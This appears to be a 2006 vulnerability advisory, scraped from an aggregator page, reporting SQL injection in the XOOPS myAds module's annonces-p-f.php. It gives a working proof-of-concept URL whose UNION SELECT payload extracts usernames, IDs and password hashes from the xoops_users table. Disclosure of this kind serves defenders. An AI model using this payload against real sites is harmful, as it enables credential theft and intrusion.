Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13937
HistoryAug 18, 2006 - 12:00 a.m.

SQL-Injection in xoops myAds module

2006-08-1800:00:00
vulners.com
18

Advisory : SQL-Injection in xoops myAds module

Home Page: http://www.xoops.org/

Уязвимость/Vulnerability:
SQL-injection

Уязвимый скрипт/Vulnerable script: annonces-p-f.php

http://www.target.com/modules/myAds/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uid,uname,5,6,7,8,9,10,11,12,13+from+xoops_users+limit+0,1/*

Copyright © Cyber Lords Community
www.cyberlords.net